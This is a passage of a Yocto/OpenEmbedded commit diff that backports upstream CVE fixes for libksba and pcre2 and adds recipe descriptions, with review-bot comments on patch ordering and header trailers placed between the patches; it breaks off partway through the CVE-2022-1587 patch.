file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \
"
-SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git \
+SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git;branch=master;protocol=https \
file://0001-Makefile-cleanup-install-for-rebuilds.patch \
file://0001-Make-man-pages-reproducible.patch"
SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba"
diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
new file mode 100644
index 0000000000..ff9f2f9275
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-3515.patch
@@ -0,0 +1,47 @@
+From 4b7d9cd4a018898d7714ce06f3faf2626c14582b Mon Sep 17 00:00:00 2001
+From: Werner Koch <wk@gnupg.org>
+Date: Wed, 5 Oct 2022 14:19:06 +0200
+Subject: [PATCH] Detect a possible overflow directly in the TLV parser.
+
+* src/ber-help.c (_ksba_ber_read_tl): Check for overflow of a commonly
+used sum.
+--
+
+It is quite common to have checks like
+
+ if (ti.nhdr + ti.length >= DIM(tmpbuf))
+ return gpg_error (GPG_ERR_TOO_LARGE);
+
+This patch detects possible integer overflows immmediately when
+creating the TI object.
+
+Reported-by: ZDI-CAN-18927, ZDI-CAN-18928, ZDI-CAN-18929
+
+
+Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=patch;h=4b7d9cd4a018898d7714ce06f3faf2626c14582b]
+CVE: CVE-2022-3515
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/ber-help.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/ber-help.c b/src/ber-help.c
+index 81c31ed..56efb6a 100644
+--- a/src/ber-help.c
++++ b/src/ber-help.c
+@@ -182,6 +182,12 @@ _ksba_ber_read_tl (ksba_reader_t reader, struct tag_info *ti)
+ ti->length = len;
+ }
+
++ if (ti->length > ti->nhdr && (ti->nhdr + ti->length) < ti->length)
++ {
++ ti->err_string = "header+length would overflow";
++ return gpg_error (GPG_ERR_EOVERFLOW);
++ }
++
+ /* Without this kludge some example certs can't be parsed */
+ if (ti->class == CLASS_UNIVERSAL && !ti->tag)
+ ti->length = 0;
+--
+2.11.0
+
diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
new file mode 100644
index 0000000000..b09d0eb557
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
@@ -0,0 +1,69 @@
+From b17444b3c47e32c77a3ba5335ae30ccbadcba3cf Mon Sep 17 00:00:00 2001
+From: Werner Koch <wk@gnupg.org>
+Date: Tue, 22 Nov 2022 16:36:46 +0100
+Subject: [PATCH] Fix an integer overflow in the CRL signature parser.
+
+* src/crl.c (parse_signature): N+N2 now checked for overflow.
+
+* src/ocsp.c (parse_response_extensions): Do not accept too large
+values.
+(parse_single_extensions): Ditto.
+--
+
+The second patch is an extra safegourd not related to the reported
+bug.
+
+GnuPG-bug-id: 6284
+Reported-by: Joseph Surin, elttam
+CVE: CVE-2022-47629
+https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=commit;h=f61a5ea4e0f6a80fd4b28ef0174bee77793cf070
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/crl.c | 2 +-
+ src/ocsp.c | 12 ++++++++++++
+ 2 files changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/src/crl.c b/src/crl.c
+index 87a3fa3..9d3028e 100644
+--- a/src/crl.c
++++ b/src/crl.c
+@@ -1434,7 +1434,7 @@ parse_signature (ksba_crl_t crl)
+ && !ti.is_constructed) )
+ return gpg_error (GPG_ERR_INV_CRL_OBJ);
+ n2 = ti.nhdr + ti.length;
+- if (n + n2 >= DIM(tmpbuf))
++ if (n + n2 >= DIM(tmpbuf) || (n + n2) < n)
+ return gpg_error (GPG_ERR_TOO_LARGE);
+ memcpy (tmpbuf+n, ti.buf, ti.nhdr);
+ err = read_buffer (crl->reader, tmpbuf+n+ti.nhdr, ti.length);
+diff --git a/src/ocsp.c b/src/ocsp.c
+index 4b26f8d..c41234e 100644
+--- a/src/ocsp.c
++++ b/src/ocsp.c
+@@ -912,6 +912,12 @@ parse_response_extensions (ksba_ocsp_t ocsp,
+ else
+ ocsp->good_nonce = 1;
+ }
++ if (ti.length > (1<<24))
++ {
++ /* Bail out on much too large objects. */
++ err = gpg_error (GPG_ERR_BAD_BER);
++ goto leave;
++ }
+ ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
+ if (!ex)
+ {
+@@ -979,6 +985,12 @@ parse_single_extensions (struct ocsp_reqitem_s *ri,
+ err = parse_octet_string (&data, &datalen, &ti);
+ if (err)
+ goto leave;
++ if (ti.length > (1<<24))
++ {
++ /* Bail out on much too large objects. */
++ err = gpg_error (GPG_ERR_BAD_BER);
++ goto leave;
++ }
+ ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
+ if (!ex)
+ {
diff --git a/meta/recipes-support/libksba/libksba_1.3.5.bb b/meta/recipes-support/libksba/libksba_1.3.5.bb
index 336d7f8177..5293aa91e1 100644
--- a/meta/recipes-support/libksba/libksba_1.3.5.bb
+++ b/meta/recipes-support/libksba/libksba_1.3.5.bb
@@ -1,4 +1,9 @@
SUMMARY = "Easy API to create and parse X.509 and CMS related objects"
+DESCRIPTION = "A library to make the tasks of working with X.509 certificates, \
+CMS data and related objects more easy. It provides a highlevel interface to \
+the implemented protocols and presents the data in a consistent way. The \
+library does not rely on another cryptographic library but provides \
+hooks for easy integration with Libgcrypt. "
HOMEPAGE = "http://www.gnupg.org/related_software/libksba/"
LICENSE = "GPLv3+ & (GPLv2+ | LGPLv3+)"
LICENSE_${PN} = "GPLv2+ | LGPLv3+"
@@ -17,7 +22,10 @@ inherit autotools binconfig-disabled pkgconfig texinfo
UPSTREAM_CHECK_URI = "https://gnupg.org/download/index.html"
SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
- file://ksba-add-pkgconfig-support.patch"
+ file://ksba-add-pkgconfig-support.patch \
+ file://CVE-2022-47629.patch \
+ file://CVE-2022-3515.patch \
+"
SRC_URI[md5sum] = "8302a3e263a7c630aa7dea7d341f07a2"
SRC_URI[sha256sum] = "41444fd7a6ff73a79ad9728f985e71c9ba8cd3e5e53358e70d5f066d35c1a340"
diff --git a/meta/recipes-support/libnl/libnl_3.5.0.bb b/meta/recipes-support/libnl/libnl_3.5.0.bb
index 9d0e1441a9..f4b5d40bb2 100644
--- a/meta/recipes-support/libnl/libnl_3.5.0.bb
+++ b/meta/recipes-support/libnl/libnl_3.5.0.bb
@@ -1,4 +1,9 @@
SUMMARY = "A library for applications dealing with netlink sockets"
+DESCRIPTION = "The libnl suite is a collection of libraries providing \
+APIs to netlink protocol based Linux kernel interfaces. libnl is the core \
+library implementing the fundamentals required to use the netlink protocol \
+such as socket handling, message construction and parsing, and sending \
+and receiving of data."
HOMEPAGE = "http://www.infradead.org/~tgr/libnl/"
SECTION = "libs/network"
diff --git a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch b/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
deleted file mode 100644
index 89b44f6aa6..0000000000
--- a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-Upstream-Status: Inappropriate [debian patch]
-
-This patch address a namespace collision with libc.
-
-Although there is no "#include <regex.h>" in the source file, at
-runtime, it's unintentionally linked to the libc version, the regcomp of
-libc is called instead the pcre one using pcre's data structure...
-that looks like a disaster.
-
-Can patch is from Debian (and Ubuntu 11.04alpha has it also).
-
-[sgw: added patch comment]
-Signed-off-by: Qing He <qing.he@intel.com>
-Signed-off-by: Saul Wold <sgw@linux.intel.com>
-
---- a/pcreposix.h 2010-05-17 00:17:23.000000000 +0800
-+++ b/pcreposix.h 2009-01-15 04:32:17.000000000 +0800
-@@ -133,14 +130,19 @@
-
- /* The functions */
-
--PCREPOSIX_EXP_DECL int regcomp(regex_t *, const char *, int);
--PCREPOSIX_EXP_DECL int regexec(const regex_t *, const char *, size_t,
-+PCREPOSIX_EXP_DECL int pcreposix_regcomp(regex_t *, const char *, int);
-+PCREPOSIX_EXP_DECL int pcreposix_regexec(const regex_t *, const char *, size_t,
- regmatch_t *, int);
--PCREPOSIX_EXP_DECL size_t regerror(int, const regex_t *, char *, size_t);
--PCREPOSIX_EXP_DECL void regfree(regex_t *);
-+PCREPOSIX_EXP_DECL size_t pcreposix_regerror(int, const regex_t *, char *, size_t);
-+PCREPOSIX_EXP_DECL void pcreposix_regfree(regex_t *);
-
- #ifdef __cplusplus
- } /* extern "C" */
- #endif
-
-+#define regcomp pcreposix_regcomp
-+#define regexec pcreposix_regexec
-+#define regerror pcreposix_regerror
-+#define regfree pcreposix_regfree
-+
- #endif /* End of pcreposix.h */
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
new file mode 100644
index 0000000000..42ee417fe7
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
@@ -0,0 +1,30 @@
+From 5d1e62b0155292b994aa1c96d4ed8ce4346ef4c2 Mon Sep 17 00:00:00 2001
+From: Zoltan Herczeg <hzmester@freemail.hu>
+Date: Thu, 24 Mar 2022 05:34:42 +0000
+Subject: [PATCH] Fix incorrect value reading in JIT.
+
+CVE: CVE-2022-1586
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc3]
+
+(cherry picked from commit d4fa336fbcc388f89095b184ba6d99422cfc676c)
+Signed-off-by: Shinu Chandran <shinucha@cisco.com>
+---
+ src/pcre2_jit_compile.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index 493c96d..fa57942 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -7188,7 +7188,7 @@ while (*cc != XCL_END)
+ {
+ SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
+ cc++;
+- if (*cc == PT_CLIST && *cc == XCL_PROP)
++ if (*cc == PT_CLIST && cc[-1] == XCL_PROP)
+ {
+ other_cases = PRIV(ucd_caseless_sets) + cc[1];
+ while (*other_cases != NOTACHAR)
+--
+2.25.1
+
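Review bot: This patch only applies on top of the other two pcre2 patches in the commit, and nothing in its header says so. Its base blob for src/pcre2_jit_compile.c is `493c96d`, which is the result blob shown in CVE-2022-1587.patch (`5d43865..493c96d`), and the line it replaces, `if (*cc == PT_CLIST && *cc == XCL_PROP)`, is the one CVE-2022-1586.patch introduces. A header line such as `Must be applied after CVE-2022-1586.patch and CVE-2022-1587.patch` would document the ordering. The recipe's SRC_URI hunk is not visible here, so check that the three entries are listed in that order.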
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
new file mode 100644
index 0000000000..fbbbc9ca77
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
@@ -0,0 +1,59 @@
+From 233c4248550d0c1d9bfee42198d5ee0855b7d413 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 23 May 2022 13:52:39 +0530
+Subject: [PATCH] CVE-2022-1586
+
+Upstream-Status: Backport from https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ ChangeLog | 3 +++
+ src/pcre2_jit_compile.c | 2 +-
+ src/pcre2_jit_test.c | 4 ++++
+ 3 files changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index 0926c29..b5d72dc 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -1,6 +1,9 @@
+ Change Log for PCRE2
+ --------------------
+
++23. Fixed a unicode properrty matching issue in JIT. The character was not
++fully read in caseless matching.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index f564127..5d43865 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -7119,7 +7119,7 @@ while (*cc != XCL_END)
+ {
+ SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
+ cc++;
+- if (*cc == PT_CLIST)
++ if (*cc == PT_CLIST && *cc == XCL_PROP)
+ {
+ other_cases = PRIV(ucd_caseless_sets) + cc[1];
+ while (*other_cases != NOTACHAR)
+diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
+index a9b3880..9df87fd 100644
+--- a/src/pcre2_jit_test.c
++++ b/src/pcre2_jit_test.c
+@@ -408,6 +408,10 @@ static struct regression_test_case regression_test_cases[] = {
+ { MUP, A, 0, 0 | F_PROPERTY, "[\xc3\xa2-\xc3\xa6\xc3\x81-\xc3\x84\xe2\x80\xa8-\xe2\x80\xa9\xe6\x92\xad\\p{Zs}]{2,}", "\xe2\x80\xa7\xe2\x80\xa9\xe6\x92\xad \xe6\x92\xae" },
+ { MUP, A, 0, 0 | F_PROPERTY, "[\\P{L&}]{2}[^\xc2\x85-\xc2\x89\\p{Ll}\\p{Lu}]{2}", "\xc3\xa9\xe6\x92\xad.a\xe6\x92\xad|\xc2\x8a#" },
+ { PCRE2_UCP, 0, 0, 0 | F_PROPERTY, "[a-b\\s]{2,5}[^a]", "AB baaa" },
++ { MUP, 0, 0, 0 | F_NOMATCH, "[^\\p{Hangul}\\p{Z}]", " " },
++ { MUP, 0, 0, 0, "[\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
++ { MUP, 0, 0, 0, "[\\x{a92e}\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
++ { CMUP, 0, 0, 0, "[^S]\\B", "\xe2\x80\x8a" },
+
+ /* Possible empty brackets. */
+ { MU, A, 0, 0, "(?:|ab||bc|a)+d", "abcxabcabd" },
+--
+2.25.1
+
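Review bot: The patch header has no `CVE:` trailer, unlike the other CVE patches in this commit; the identifier appears only in the subject and the file name. It should carry `CVE: CVE-2022-1586` so the fix stays attributable if the file is renamed or squashed. The status line is also free-form (`Backport from https://...`); the form used elsewhere in the commit would be `Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a]`. The added ChangeLog entry misspells "properrty".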
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
new file mode 100644
index 0000000000..70f9f9f079
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
@@ -0,0 +1,660 @@
+From aa5aac0d209e3debf80fc2db924d9401fc50454b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 23 May 2022 14:11:11 +0530
+Subject: [PATCH] CVE-2022-1587
+
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0]
+CVE: CVE-2022-1587
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ ChangeLog | 3 +
+ src/pcre2_jit_compile.c | 290 ++++++++++++++++++++++++++--------------
+ src/pcre2_jit_test.c | 1 +
+ 3 files changed, 194 insertions(+), 100 deletions(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index b5d72dc..de82de9 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -4,6 +4,9 @@ Change Log for PCRE2
+ 23. Fixed a unicode properrty matching issue in JIT. The character was not
+ fully read in caseless matching.
+
++24. Fixed an issue affecting recursions in JIT caused by duplicated data
++transfers.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index 5d43865..493c96d 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -407,6 +407,9 @@ typedef struct compiler_common {
+ /* Locals used by fast fail optimization. */
+ sljit_s32 fast_fail_start_ptr;
+ sljit_s32 fast_fail_end_ptr;
++ /* Variables used by recursive call generator. */
++ sljit_s32 recurse_bitset_size;
++ uint8_t *recurse_bitset;
+
+ /* Flipped and lower case tables. */
+ const sljit_u8 *fcc;
+@@ -2109,19 +2112,39 @@ for (i = 0; i < RECURSE_TMP_REG_COUNT; i++)
+
+ #undef RECURSE_TMP_REG_COUNT
+
++static BOOL recurse_check_bit(compiler_common *common, sljit_sw bit_index)
++{
++uint8_t *byte;
++uint8_t mask;
++
++SLJIT_ASSERT((bit_index & (sizeof(sljit_sw) - 1)) == 0);
++
++bit_index >>= SLJIT_WORD_SHIFT;
++
++mask = 1 << (bit_index & 0x7);
++byte = common->recurse_bitset + (bit_index >> 3);
++
++if (*byte & mask)
++ return FALSE;
++
++*byte |= mask;
++return TRUE;
++}
++
+ static int get_recurse_data_length(compiler_common *common, PCRE2_SPTR cc, PCRE2_SPTR ccend,
+ BOOL *needs_control_head, BOOL *has_quit, BOOL *has_accept)
+ {
+ int length = 1;
+-int size;
++int size, offset;
+ PCRE2_SPTR alternative;
+ BOOL quit_found = FALSE;
+ BOOL accept_found = FALSE;
+ BOOL setsom_found = FALSE;
+ BOOL setmark_found = FALSE;
+-BOOL capture_last_found = FALSE;
+ BOOL control_head_found = FALSE;
+
++memset(common->recurse_bitset, 0, common->recurse_bitset_size);
++
+ #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+ control_head_found = TRUE;
+@@ -2144,15 +2167,17 @@ while (cc < ccend)
+ setsom_found = TRUE;
+ if (common->mark_ptr != 0)
+ setmark_found = TRUE;
+- if (common->capture_last_ptr != 0)
+- capture_last_found = TRUE;
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
++ length++;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_KET:
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0)
+ {
+- length++;
++ if (recurse_check_bit(common, offset))
++ length++;
+ SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
+ cc += PRIVATE_DATA(cc + 1);
+ }
+@@ -2169,39 +2194,55 @@ while (cc < ccend)
+ case OP_SBRA:
+ case OP_SBRAPOS:
+ case OP_SCOND:
+- length++;
+ SLJIT_ASSERT(PRIVATE_DATA(cc) != 0);
++ if (recurse_check_bit(common, PRIVATE_DATA(cc)))
++ length++;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_CBRA:
+ case OP_SCBRA:
+- length += 2;
+- if (common->capture_last_ptr != 0)
+- capture_last_found = TRUE;
+- if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
++ offset = GET2(cc, 1 + LINK_SIZE);
++ if (recurse_check_bit(common, OVECTOR(offset << 1)))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
++ length += 2;
++ }
++ if (common->optimized_cbracket[offset] == 0 && recurse_check_bit(common, OVECTOR_PRIV(offset)))
++ length++;
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ length++;
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+ case OP_CBRAPOS:
+ case OP_SCBRAPOS:
+- length += 2 + 2;
+- if (common->capture_last_ptr != 0)
+- capture_last_found = TRUE;
++ offset = GET2(cc, 1 + LINK_SIZE);
++ if (recurse_check_bit(common, OVECTOR(offset << 1)))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
++ length += 2;
++ }
++ if (recurse_check_bit(common, OVECTOR_PRIV(offset)))
++ length++;
++ if (recurse_check_bit(common, PRIVATE_DATA(cc)))
++ length++;
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
++ length++;
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+ case OP_COND:
+ /* Might be a hidden SCOND. */
+ alternative = cc + GET(cc, 1);
+- if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
++ if ((*alternative == OP_KETRMAX || *alternative == OP_KETRMIN) && recurse_check_bit(common, PRIVATE_DATA(cc)))
+ length++;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
+ length++;
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+@@ -2210,8 +2251,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+ if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2219,8 +2264,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 2 + IMM2_SIZE;
+ #ifdef SUPPORT_UNICODE
+ if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2228,20 +2277,29 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
+ length++;
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 1 + IMM2_SIZE;
+ break;
+
+@@ -2253,7 +2311,9 @@ while (cc < ccend)
+ #else
+ size = 1 + 32 / (int)sizeof(PCRE2_UCHAR);
+ #endif
+- if (PRIVATE_DATA(cc) != 0)
++
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
+ length += get_class_iterator_size(cc + size);
+ cc += size;
+ break;
+@@ -2288,8 +2348,7 @@ while (cc < ccend)
+ case OP_THEN:
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+ quit_found = TRUE;
+- if (!control_head_found)
+- control_head_found = TRUE;
++ control_head_found = TRUE;
+ cc++;
+ break;
+
+@@ -2309,8 +2368,6 @@ SLJIT_ASSERT(cc == ccend);
+
+ if (control_head_found)
+ length++;
+-if (capture_last_found)
+- length++;
+ if (quit_found)
+ {
+ if (setsom_found)
+@@ -2343,14 +2400,12 @@ sljit_sw shared_srcw[3];
+ sljit_sw kept_shared_srcw[2];
+ int private_count, shared_count, kept_shared_count;
+ int from_sp, base_reg, offset, i;
+-BOOL setsom_found = FALSE;
+-BOOL setmark_found = FALSE;
+-BOOL capture_last_found = FALSE;
+-BOOL control_head_found = FALSE;
++
++memset(common->recurse_bitset, 0, common->recurse_bitset_size);
+
+ #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+-control_head_found = TRUE;
++recurse_check_bit(common, common->control_head_ptr);
+ #endif
+
+ switch (type)
+@@ -2438,11 +2493,10 @@ while (cc < ccend)
+ {
+ case OP_SET_SOM:
+ SLJIT_ASSERT(common->has_set_som);
+- if (has_quit && !setsom_found)
++ if (has_quit && recurse_check_bit(common, OVECTOR(0)))
+ {
+ kept_shared_srcw[0] = OVECTOR(0);
+ kept_shared_count = 1;
+- setsom_found = TRUE;
+ }
+ cc += 1;
+ break;
+@@ -2450,33 +2504,31 @@ while (cc < ccend)
+ case OP_RECURSE:
+ if (has_quit)
+ {
+- if (common->has_set_som && !setsom_found)
++ if (common->has_set_som && recurse_check_bit(common, OVECTOR(0)))
+ {
+ kept_shared_srcw[0] = OVECTOR(0);
+ kept_shared_count = 1;
+- setsom_found = TRUE;
+ }
+- if (common->mark_ptr != 0 && !setmark_found)
++ if (common->mark_ptr != 0 && recurse_check_bit(common, common->mark_ptr))
+ {
+ kept_shared_srcw[kept_shared_count] = common->mark_ptr;
+ kept_shared_count++;
+- setmark_found = TRUE;
+ }
+ }
+- if (common->capture_last_ptr != 0 && !capture_last_found)
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ {
+ shared_srcw[0] = common->capture_last_ptr;
+ shared_count = 1;
+- capture_last_found = TRUE;
+ }
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_KET:
+- if (PRIVATE_DATA(cc) != 0)
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0)
+ {
+- private_count = 1;
+- private_srcw[0] = PRIVATE_DATA(cc);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
+ cc += PRIVATE_DATA(cc + 1);
+ }
+@@ -2493,50 +2545,66 @@ while (cc < ccend)
+ case OP_SBRA:
+ case OP_SBRAPOS:
+ case OP_SCOND:
+- private_count = 1;
+ private_srcw[0] = PRIVATE_DATA(cc);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_CBRA:
+ case OP_SCBRA:
+- offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
+- shared_srcw[0] = OVECTOR(offset);
+- shared_srcw[1] = OVECTOR(offset + 1);
+- shared_count = 2;
++ offset = GET2(cc, 1 + LINK_SIZE);
++ shared_srcw[0] = OVECTOR(offset << 1);
++ if (recurse_check_bit(common, shared_srcw[0]))
++ {
++ shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
++ shared_count = 2;
++ }
+
+- if (common->capture_last_ptr != 0 && !capture_last_found)
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ {
+- shared_srcw[2] = common->capture_last_ptr;
+- shared_count = 3;
+- capture_last_found = TRUE;
++ shared_srcw[shared_count] = common->capture_last_ptr;
++ shared_count++;
+ }
+
+- if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
++ if (common->optimized_cbracket[offset] == 0)
+ {
+- private_count = 1;
+- private_srcw[0] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
++ private_srcw[0] = OVECTOR_PRIV(offset);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ }
++
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+ case OP_CBRAPOS:
+ case OP_SCBRAPOS:
+- offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
+- shared_srcw[0] = OVECTOR(offset);
+- shared_srcw[1] = OVECTOR(offset + 1);
+- shared_count = 2;
++ offset = GET2(cc, 1 + LINK_SIZE);
++ shared_srcw[0] = OVECTOR(offset << 1);
++ if (recurse_check_bit(common, shared_srcw[0]))
++ {
++ shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
++ shared_count = 2;
++ }
+
+- if (common->capture_last_ptr != 0 && !capture_last_found)
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ {
+- shared_srcw[2] = common->capture_last_ptr;
+- shared_count = 3;
+- capture_last_found = TRUE;
++ shared_srcw[shared_count] = common->capture_last_ptr;
++ shared_count++;
+ }
+
+- private_count = 2;
+ private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
++
++ offset = OVECTOR_PRIV(offset);
++ if (recurse_check_bit(common, offset))
++ {
++ private_srcw[private_count] = offset;
++ private_count++;
++ }
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+@@ -2545,18 +2613,17 @@ while (cc < ccend)
+ alternative = cc + GET(cc, 1);
+ if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
+ {
+- private_count = 1;
+ private_srcw[0] = PRIVATE_DATA(cc);
